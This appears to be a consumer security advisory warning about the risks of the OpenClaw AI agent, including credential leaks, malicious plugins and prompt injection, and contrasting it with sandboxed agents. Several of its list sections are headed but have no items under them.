AI agents—software that can take actions on your behalf using artificial intelligence—are having a moment. The appeal is obvious: imagine a robot butler that triages your inbox, manages your calendar, and handles tedious tasks while you focus on more important work.

That’s the promise driving the recent surge in popularity of OpenClaw (formerly known as Clawdbot and Moltbot), which is now all the rage in tech circles. Token Security found that at least one person is using it at nearly a quarter of its enterprise customers, mostly running from personal accounts. That’s a shadow IT nightmare—employees connecting work email and Slack to an unsanctioned tool that IT doesn’t know about and can’t monitor. Whether you’re an individual tempted by OpenClaw’s promise or a manager wondering what your users are up to, you need to understand the risks these AI agents pose.

OpenClaw is an AI agent built around “skills”—installable plugins that let it integrate with your messaging apps, email, calendar, and more. You communicate with OpenClaw via Messages, Slack, WhatsApp, and similar apps. Because it’s open source, you’ll need to provide your own API keys for AI services like OpenAI or Anthropic, which means ongoing costs that can add up quickly—people have reported spending $10–$25 per day.

The more serious problem? Security researchers have discovered serious vulnerabilities, including misconfigured instances exposed to the internet that leak credentials, API keys, and private messages, and a supply chain vulnerability where malicious skills uploaded to the ClawdHub library can execute arbitrary commands on users’ systems. Even beyond specific bugs, OpenClaw’s fundamental design encourages users to grant broad access to sensitive accounts.

Why AI Agents Are Risky

Security concerns aren’t unique to OpenClaw—they apply to any AI agent that acts on a user’s behalf. Here’s what’s at stake:

How to Reduce Your Risk

We’ll come right out and say it: we strongly recommend against installing OpenClaw or other AI agents on your Mac. In a year or so, Apple may have updated Siri to provide many of these capabilities with significantly stronger privacy and security. But for now, just say no.

If you decide to use AI agents despite these risks, here are practical steps to protect yourself:

If you run a business, you should assume that some employees have already installed OpenClaw or will soon, and may have connected their work email and Slack accounts without realizing the associated risks. Here’s what you can do:

What About Claude Cowork and OpenAI Codex?

Not all AI agent platforms carry the same level of risk. Anthropic’s Claude Cowork and OpenAI’s Codex take a different architectural approach from OpenClaw. Rather than requesting authentication tokens for your email, messaging, and other personal services, they operate within their own controlled, sandboxed environments. These systems work primarily with files, code, and data you explicitly place into their workspace, which substantially limits the fallout from an attacker gaining some level of control.

This containment approach reduces risk, but does not eliminate it. Prompt injection remains a concern whenever an AI system processes untrusted content, even inside a sandbox. An AI agent analyzing a malicious document could still be manipulated into taking unintended actions within its allowed environment. Similarly, any code generated by these systems—particularly code that touches the network or executes system commands—should be reviewed carefully to make sure it hasn’t been compromised by prompt injection.

The key distinction is scope. Claude Cowork and Codex are designed to operate within a defined workspace, whereas tools like OpenClaw require standing access to your most sensitive accounts. From a security perspective, a compromised sandbox is a recoverable incident; a compromised email or messaging account may not be.

The Bottom Line

AI agents promise a lot and may provide genuine convenience, but at a cost beyond just paying for API tokens. Before you or anyone in your organization connects an AI agent to sensitive accounts, consider: What’s the worst that could happen if this system were compromised by an attacker? If the answer involves passwords being stolen, private email being exposed, or photos being posted to social media without your knowledge, proceed with extreme caution. If you can imagine a way financial accounts could be accessed or business data stolen, don’t proceed at all.

(Featured image by iStock.com/Thinkhubstudio)


Social Media: AI agents like OpenClaw promise to automate tedious tasks, but recent security vulnerabilities highlight the dangers of using them. Learn the risks and how to protect yourself—and your organization—if you choose to use an agent.